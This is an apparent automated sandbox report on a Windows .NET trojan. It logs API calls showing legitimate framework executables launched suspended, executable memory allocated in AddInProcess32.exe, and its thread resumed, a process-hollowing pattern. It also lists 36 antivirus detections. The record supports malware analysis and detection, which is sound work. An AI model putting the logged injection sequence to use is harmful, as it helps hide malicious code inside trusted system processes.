CreateProcessInternalW April 4, 2023, 5:12 p.m.	thread_identifier: 2480 thread_handle: 0x0000000000000254 process_identifier: 2476 current_directory: filepath: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000000000000258	1	1
CreateProcessInternalW April 4, 2023, 5:12 p.m.	thread_identifier: 2516 thread_handle: 0x000000000000026c process_identifier: 2512 current_directory: filepath: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000000000000270	1	1
CreateProcessInternalW April 4, 2023, 5:12 p.m.	thread_identifier: 2552 thread_handle: 0x0000000000000278 process_identifier: 2548 current_directory: filepath: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000000000000274	1	1
CreateProcessInternalW April 4, 2023, 5:12 p.m.	thread_identifier: 2588 thread_handle: 0x0000000000000280 process_identifier: 2584 current_directory: filepath: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000000000000027c	1	1
CreateProcessInternalW April 4, 2023, 5:12 p.m.	thread_identifier: 2624 thread_handle: 0x0000000000000288 process_identifier: 2620 current_directory: filepath: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000000000000284	1	1
CreateProcessInternalW April 4, 2023, 5:12 p.m.	thread_identifier: 2664 thread_handle: 0x0000000000000290 process_identifier: 2660 current_directory: filepath: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000000000000028c	1	1
CreateProcessInternalW April 4, 2023, 5:12 p.m.	thread_identifier: 2700 thread_handle: 0x0000000000000298 process_identifier: 2696 current_directory: filepath: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000000000000294	1	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 2696 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000294	1	0
NtResumeThread April 4, 2023, 5:12 p.m.	thread_handle: 0x0000000000000298 suspend_count: 1 process_identifier: 2696	1	0

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Lionic	Trojan.Win32.Generic.4!c
MicroWorld-eScan	Gen:Variant.Tedy.270238
McAfee	Artemis!8B817B79A103
K7AntiVirus	Trojan ( 005a1d721 )
Alibaba	Trojan:MSIL/GenKryptik.f610aed2
K7GW	Trojan ( 005a1d721 )
CrowdStrike	win/malicious_confidence_100% (W)
Symantec	Trojan Horse
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/GenKryptik.GIEH
Cynet	Malicious (score: 100)
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-Spy.MSIL.Noon.gen
BitDefender	Gen:Variant.Tedy.270238
Avast	Win64:PWSX-gen [Trj]
Emsisoft	Gen:Variant.Tedy.270238 (B)
F-Secure	Trojan.TR/AD.BadNetLdr.pudcq
VIPRE	Gen:Variant.Tedy.270238
McAfee-GW-Edition	Artemis!Trojan
FireEye	Generic.mg.8b817b79a103307d
Sophos	Mal/Generic-S
GData	Gen:Variant.Tedy.270238
Avira	TR/AD.BadNetLdr.pudcq
Arcabit	Trojan.Tedy.D41F9E
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Noon.gen
Microsoft	Trojan:Win32/Casdet!rfn
Google	Detected
AhnLab-V3	Trojan/Win.Generic.C5405110
ALYac	Gen:Variant.Tedy.270238
MAX	malware (ai score=82)
Cylance	unsafe
TrendMicro-HouseCall	TROJ_GEN.R002H0DD323
Ikarus	Trojan.MSIL.Krypt
Fortinet	MSIL/GenKryptik.GIEH!tr
AVG	Win64:PWSX-gen [Trj]
DeepInstinct	MALICIOUS

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All